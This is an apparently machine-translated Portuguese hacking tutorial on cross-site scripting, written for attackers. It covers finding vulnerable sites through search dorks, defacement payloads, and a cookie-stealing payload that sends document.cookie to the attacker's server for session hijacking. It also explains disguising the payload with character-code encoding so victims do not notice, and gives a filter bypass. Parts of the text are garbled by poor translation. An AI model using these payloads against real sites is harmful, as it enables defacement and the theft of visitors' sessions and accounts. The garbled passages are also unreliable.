Tutorial Cross Site Scripting (XSS)
Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML.
É uma vulnerabilidade que está em quase todos os site que você pode encontrar na WWW.
Além disso, vou falar sobre 2 maneiras diferentes de usar XSS …
1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página.
2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos “input”, como shoutboxes, blogs e guestbooks.
Encontrando vulnerabilidades XSS
1. Http://www.google.com Visite
2. Use “dorks Google”, como search.php? Q =
3. Encontrado o “direito” site para injetá-lo.
Noções básicas de XSS
Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:
| <script>alert(“something”)</script> |
Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer “alguma coisa”.
Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS.
Basta olhar:
| http://database.delete.com/search.php?q=<script>alert(“something”)</script> |
Isso foi um exemplo para um XSS com javascript.
Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS.
Aqui está um exemplo de uma injeção HTML:
| <br><br><b><u>something</u></b> |
Será algo como:
| http://database.delete.com/search.php?q=<br><br><b><u>something</u></b> |
Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS.
Defacment com XSS
Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos:
| <IMG SRC=”http://mywebsite.com/defacmentpic.jpg”> |
= Irá incluir uma imagem
| <EMBED SRC=”http://mywebsite.com/deface.swf” |
= Incluirá um vídeo em Flash
| <embed src=”deface.mid” hidden autostart=”true” loop=”false” /> |
= Vai incluir um arquivo de música em modo oculto
| <script>window.open( “http://www.XXXXXXX.net/” )</script> |
= Redireccionado para outro site, neste caso “XXXXXXXXXXXX.net”
Roubar cookies usando XSS
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)
Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados.
Certifique-se que ele funciona!
Procura um site vuln e insira o seguinte código:
(substitui-lo com suas informações)
| document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie |
Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu CookieLogger.
Analisar o madeireiro para seus cookies e sequestrar a sua sessão.
Mas o que é se o site não possui uma função tal loja?
Veja …
| http://website.com/search.php?q=document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie |
Você será redirecionado ao site original para o servidor.
(você deve cripta “a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL)
Mas como “crypt” esse código para se tornar “normal”, de modo que sua vítima não percebe o redirecionamento para o servidor?
Fácil … tudo que você precisa é de uma String para ASCII Converter e as características da função ()
(Http://www.easycalculation.com/ascii-hex.php)
Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII.
| <script>alert(“Example”)</script> |
é igual
| 60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62 |
Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta:
| 60,115,99,114,105, [...] |
Finished! Você crypted seu código malicioso a um “código” malicioso escondido: D!
Ignorando Filtros
Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens?
Hm, temos de encontrar outro método … basta escrever o código de uma maneira diferente.
| <script>alert(“Example”)</script> |
seria
| ‘)alert(“Example”); |
E ISSO GALERA ATE A PROXIAMA.
Autor: L0RD_R3D
